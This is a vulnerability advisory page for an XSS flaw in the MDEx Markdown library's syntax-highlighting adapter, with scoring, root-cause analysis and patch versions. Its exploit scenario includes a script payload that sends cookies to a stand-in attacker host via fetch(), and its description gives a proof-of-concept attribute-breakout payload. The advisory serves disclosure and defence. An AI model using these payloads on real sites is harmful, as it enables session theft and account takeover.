Skip to main content

MDEx EUVDEUVD-2026-40174

| CVE-2026-53427 LOW
Cross-site Scripting (XSS) (CWE-79)
2026-06-29 EEF
2.3
CVSS 4.0 · Vendor: EEF

Severity by source

Vendor (EEF) PRIMARY
2.3 LOW
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
4.7 MEDIUM

Non-default configuration (syntax highlighting plus full_info_string: true both required) maps to AC:H; XSS executes in victim browser justifying S:C with limited C:L/I:L; no availability impact.

3.1 AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (EEF).

CVSS VectorVendor: EEF

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

1
Analysis Generated
Jun 29, 2026 - 19:22 vuln.today

DescriptionCVE.org

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in leandrocp MDEx allows stored or reflected cross-site scripting via attacker-controlled Markdown.

When syntax highlighting and full info-string forwarding (render: [full_info_string: true]) are enabled, the Lumis adapter copies the value of a code fence's highlight_lines_class info-string attribute, unescaped, into the class attribute of every rendered line. comrak_nif::lumis_adapter::LumisAdapter::parse_custom_attributes in native/comrak_nif/src/lumis_adapter.rs shlex-parses the info string and stores each key=value pair verbatim, highlight_lines_config pulls highlight_lines_class into the per-line class value, and write_highlighted interpolates that value directly into the class attribute of the per-line <div>. A single-quoted shell token preserves an inner double quote through shlex parsing, so a value such as '"><script>alert(1)</script>' terminates the class attribute early and the markup that follows is emitted as live HTML.

An attacker who can submit Markdown (through comments, posts, wiki pages, documentation, or any user-generated content) can inject arbitrary HTML and JavaScript that runs in the browser of every user who views the rendered output, enabling session theft, account takeover, and other client-side attacks. No authentication or special privileges are required.

The vulnerable native code originally shipped inside mdex (in native/comrak_nif/src/lumis_adapter.rs) and was later extracted into the separate mdex_native package (native/mdex_native_nif/src/lumis_adapter.rs), where it remains unpatched.

This issue affects mdex from 0.11.3 before 0.12.3, and mdex_native from 0.1.0 before 0.2.3.

AnalysisAI

Stored and reflected cross-site scripting in MDEx's Lumis syntax highlighting adapter allows attackers who can submit Markdown content to inject arbitrary HTML and JavaScript into rendered output viewed by other users, enabling session theft and account takeover. The flaw exists in the native Rust code shared between the mdex (0.11.3-0.12.2) and mdex_native (0.1.0-0.2.2) packages, where the highlight_lines_class code-fence attribute is interpolated into per-line HTML div class attributes without escaping. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Submit Markdown with crafted highlight_lines_class value
Delivery
Lumis adapter shlex-parses info string, storing value verbatim
Exploit
write_highlighted interpolates unescaped value into per-line div class attribute
Execution
Victim loads page rendering the malicious Markdown
Persist
Injected script executes in victim's browser context
Impact
Session cookies or credentials exfiltrated to attacker

Vulnerability AssessmentAI

Exploitation Exploitation requires two simultaneous non-default configuration conditions: syntax highlighting must be enabled via the Lumis adapter, AND the render option full_info_string: true must be explicitly set - neither is active by default. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 2.3 accurately reflects the constrained real-world risk: AT:P (attack requirements present) captures the non-default rendering configuration prerequisite, and UI:P indicates passive victim interaction is needed. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker posts a comment or wiki page on an application using MDEx with syntax highlighting and full_info_string: true enabled, embedding a code fence whose highlight_lines_class attribute contains a crafted value such as '"><script>fetch('https://attacker.example/c?'+document.cookie)</script>'. When any user loads the page, MDEx renders the code block and the injected script executes in their browser, exfiltrating session cookies to the attacker's server and enabling account takeover without any further interaction from the victim.
Remediation Upgrade mdex to version 0.12.3 or later, and upgrade mdex_native to version 0.2.3 or later; the fix is delivered via patch commit 798a363b4339f6f7162ec8437c4c9f9b5ae6fbf3 (https://github.com/leandrocp/mdex_native/commit/798a363b4339f6f7162ec8437c4c9f9b5ae6fbf3). … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-40174 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy